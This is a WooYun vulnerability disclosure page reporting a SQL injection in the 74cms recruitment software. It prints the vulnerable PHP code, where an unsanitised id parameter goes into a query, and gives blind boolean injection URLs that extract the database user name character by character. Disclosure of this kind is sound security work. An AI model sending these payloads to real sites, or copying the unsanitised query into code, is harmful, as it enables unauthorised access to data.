当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(3) 关注此漏洞

缺陷编号: WooYun-2014-87009

漏洞标题: 74cms最新版 注入一枚

相关厂商: 74cms.com

漏洞作者: 路人曱

提交时间: 2014-12-15 15:08

公开时间: 2015-01-21 15:10

漏洞类型: SQL注射漏洞

危害等级: 中

自评Rank: 10

漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 help@wooyun.org

Tags标签: 无

0人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-12-15: 细节已通知厂商并且等待厂商处理中
2014-12-20: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放(绿盟科技唐朝安全巡航无声信息
2015-02-13: 细节向核心白帽子及相关领域专家公开
2015-02-23: 细节向普通白帽子公开
2015-03-05: 细节向实习白帽子公开
2015-01-21: 细节向公众公开

简要描述:

rt

详细说明:

74cms 141128最新版

漏洞文件:/wap/wap-resume-show.php

code 区域
<?php
/*
* 74cms WAP
* ============================================================================
* 版权所有: 骑士网络,并保留所有权利。
* 网站地址: http://**.**.**.**;
* ----------------------------------------------------------------------------
* 这不是一个自由软件!您只能在不用于商业目的的前提下对程序代码进行修改和
* 使用;不允许对程序代码以任何形式任何目的的再发布。
* ============================================================================
*/
define('IN_QISHI', true);
require_once(dirname(__FILE__).'/../include/common.inc.php');
require_once(QISHI_ROOT_PATH.'include/fun_wap.php');
require_once(QISHI_ROOT_PATH.'include/mysql.class.php');
$smarty->cache = false;
$db = new mysql($dbhost,$dbuser,$dbpass,$dbname);
$row=resume_one($_GET['id']);
if(intval($_SESSION["uid"])>0){
$sql="select * from ".table("company_down_resume")." where company_uid=$_SESSION[uid] and resume_id=$_GET[id] ";
$down_resume=$db->getone($sql);
$smarty->assign('down_resume',$down_resume);
$time=time();
$jobs_sql="select * from ".table("jobs")." where uid=$_SESSION[uid] and display=1 and deadline>$time ";
$jobs_row=$db->getall($jobs_sql);
$smarty->assign('jobs_row',$jobs_row);
}
$smarty->assign('show',$row);
$smarty->assign('goback',$_SERVER["HTTP_REFERER"]);
$smarty->display("wap/wap-resume-show.html");
?>





文件很少,漏洞也很明显



第20行

code 区域
$sql="select * from ".table("company_down_resume")." where company_uid=$_SESSION[uid] and resume_id=$_GET[id] ";



把$_GET[id]带入查询

漏洞证明:

利用很简单

先注册个个人用户,发布一份简历

再注册个企业用户

1.jpg



点击 查看联系方式

2.jpg





之后构造语句 **.**.**.**/wap/wap-resume-show.php?id=3 and if(ascii(substr(user(),1,1))=114,1,null)

user()第一位为r 则语句正确 返回 邀请面试 错误则为查看联系方式



3.jpg





4.jpg





**.**.**.**/wap/wap-resume-show.php?id=3 and if(ascii(substr(user(),2,1))=111,1,null)

5.jpg

修复方案:

intval

版权声明:转载请注明来源 路人曱@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-21 15:10

厂商回复:

最新状态:

暂无


漏洞评价:

对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值

漏洞评价(少于3人评价):
登陆后才能进行评分
100%
0%
0%
0%
0%

评价

  1. 2015-01-21 23:42 | BeenQuiver ( 普通白帽子 | Rank:103 漏洞数:27 | 专注而高效,坚持好的习惯千万不要放弃)
    0

    太明显了的

登录后才能发表评论,请先 登录